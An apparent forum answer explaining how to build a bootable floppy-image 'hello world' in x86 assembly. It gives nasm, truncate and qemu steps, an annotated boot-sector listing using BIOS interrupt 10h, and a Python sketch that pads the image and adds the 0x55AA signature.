- to position the output of text use interrupt 0x10
- binary format of the executable should be "bin" (nasm -f bin -o boot.bin code.asm)
- resize the binary file to the size of a floppy disk (truncate -s 1474560 boot.bin )
- mark the binary file as bootable disk: at location 0x1FE save the value 0x55 and at location 0x1FF save value 0xAA (use hexadecimal editor, for example: ghex2)
- start the virtual machine with your binary file as a floppy disk: (nice -n 19 qemu -fda boot.bin)
I suggest you read this on assembly bootloaders. Taken from that article, here is hello world -
org 7C00h
jmp short Start ;Jump over the data (the 'short' keyword makes the jmp instruction smaller)
Msg: db "Hello World! "
EndMsg:
Start: mov bx, 000Fh ;Page 0, colour attribute 15 (white) for the int 10 calls below
mov cx, 1 ;We will want to write 1 character
xor dx, dx ;Start at top left corner
mov ds, dx ;Ensure ds = 0 (to let us load the message)
cld ;Ensure direction flag is cleared (for LODSB)
Print: mov si, Msg ;Loads the address of the first byte of the message, 7C02h in this case
;PC BIOS Interrupt 10 Subfunction 2 - Set cursor position
;AH = 2
Char: mov ah, 2 ;BH = page, DH = row, DL = column
int 10h
lodsb ;Load a byte of the message into AL.
;Remember that DS is 0 and SI holds the
;offset of one of the bytes of the message.
;PC BIOS Interrupt 10 Subfunction 9 - Write character and colour
;AH = 9
mov ah, 9 ;BH = page, AL = character, BL = attribute, CX = character count
int 10h
inc dl ;Advance cursor
cmp dl, 80 ;Wrap around edge of screen if necessary
jne Skip
xor dl, dl
inc dh
cmp dh, 25 ;Wrap around bottom of screen if necessary
jne Skip
xor dh, dh
Skip: cmp si, EndMsg ;If we're not at end of message,
jne Char ;continue loading characters
jmp Print ;otherwise restart from the beginning of the message
times 0200h - 2 - ($ - $$) db 0 ;Zerofill up to 510 bytes
dw 0AA55h ;Boot Sector signature
;OPTIONAL:
;To zerofill up to the size of a standard 1.44MB, 3.5" floppy disk
;times 1474560 - ($ - $$) db 0
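The image layout that the assignment hints describe (signature at 0x1FE and 0x1FF, then padding to floppy size) can also be sketched in Python, which may help when checking a hand-edited file. The function name make_floppy_image and the two-byte placeholder code are mine. A real run would pass the bytes of the assembled boot.bin instead.

```python
SECTOR_SIZE = 512
FLOPPY_SIZE = 1474560  # bytes, the same value as in the truncate command

def make_floppy_image(code: bytes) -> bytes:
    """Pad code to 510 bytes, append the boot signature, then pad to floppy size."""
    if len(code) > SECTOR_SIZE - 2:
        raise ValueError("code and data must fit in 510 bytes")
    sector = code.ljust(SECTOR_SIZE - 2, b"\x00") + b"\x55\xAA"
    return sector.ljust(FLOPPY_SIZE, b"\x00")

# Placeholder code: EB FE is "jmp $", a two-byte endless loop.
image = make_floppy_image(b"\xEB\xFE")

print(len(image), hex(image[0x1FE]), hex(image[0x1FF]))
```

The two signature bytes appear in memory order 0x55, 0xAA, which is what dw 0AA55h produces on a little-endian machine.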

Resources